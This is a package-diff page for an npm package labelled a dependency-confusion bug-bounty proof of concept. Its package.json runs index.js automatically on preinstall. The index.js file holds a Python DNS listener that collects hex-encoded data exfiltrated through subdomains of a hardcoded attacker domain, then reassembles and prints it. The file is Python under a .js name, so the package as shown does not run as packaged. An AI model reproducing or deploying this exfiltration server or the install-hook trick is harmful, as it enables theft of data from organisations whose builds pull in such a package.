npm - internal-company-module-test-1337 - Versions diffs - 99.99.99 - Mend

internal-company-module-test-1337 99.99.99

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.

Files changed (2) hide show

package/index.js +70 -0
package/package.json +11 -0

package/index.js ADDED Viewed

@@ -0,0 +1,70 @@
+import socket
+import binascii
+import json
+from dnslib import DNSRecord, QTYPE, RR, A
+ATTACKER_DOMAIN = ".139-162-186-101.ip.linodeusercontent.com"
+FAKE_RESPONSE_IP = "1.2.3.4"
+# Dizionario per memorizzare i frammenti HEX (in questo caso usiamo una lista
+# assumendo che arrivino in ordine, dato che il TCP jitter del payload rallenta le richieste)
+sessions = {}
+def main():
+    server_socket = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
+    try:
+        server_socket.bind(('0.0.0.0', 53))
+        print("[*] Server STEALTH in ascolto su UDP 53...")
+    except PermissionError:
+        return
+    while True:
+        try:
+            data, addr = server_socket.recvfrom(4096)
+            dns_request = DNSRecord.parse(data)
+            qname_obj = dns_request.questions[0]._qname
+            qname = str(qname_obj).rstrip('.')
+            if qname.endswith(ATTACKER_DOMAIN.strip('.')):
+                payload = qname.replace(ATTACKER_DOMAIN.strip('.'), "").strip('.')
+                parts = payload.split('.')
+                if len(parts) >= 2:
+                    session_id = parts[0]
+                    chunk_data = parts[1]
+                    if session_id not in sessions:
+                        sessions[session_id] = []
+                        print(f"[*] Nuova sessione stealth avviata: {session_id}")
+                    if chunk_data == "eof":
+                        # Termine della trasmissione: Riassembla e decodifica l'hex
+                        full_hex = "".join(sessions[session_id])
+                        try:
+                            decoded_str = binascii.unhexlify(full_hex).decode('utf-8')
+                            json_data = json.loads(decoded_str)
+                            print(f"\n[+] ESFILTRAZIONE COMPLETATA (IP: {addr[0]})")
+                            print(json.dumps(json_data, indent=4))
+                            print("-" * 50)
+                        except Exception as e:
+                            print(f"[!] Errore decodifica: {e}")
+                        del sessions[session_id]
+                    else:
+                        # Salva il blocco HEX e rispondi
+                        sessions[session_id].append(chunk_data)
+                # Risposta per mantenere la connessione attiva e silenziosa
+                reply = dns_request.reply()
+                if dns_request.questions[0].qtype == QTYPE.A:
+                    reply.add_answer(RR(rname=qname_obj, rtype=QTYPE.A, rclass=1, ttl=60, rdata=A(FAKE_RESPONSE_IP)))
+                server_socket.sendto(reply.pack(), addr)
+        except Exception as e:
+            pass
+if __name__ == "__main__":
+    main()

package/package.json ADDED Viewed

@@ -0,0 +1,11 @@
+{
+  "name": "internal-company-module-test-1337",
+  "version": "99.99.99",
+  "description": "Bug Bounty PoC for Dependency Confusion",
+  "main": "index.js",
+  "scripts": {
+    "preinstall": "node index.js"
+  },
+  "author": "Security Researcher",
+  "license": "MIT"
+}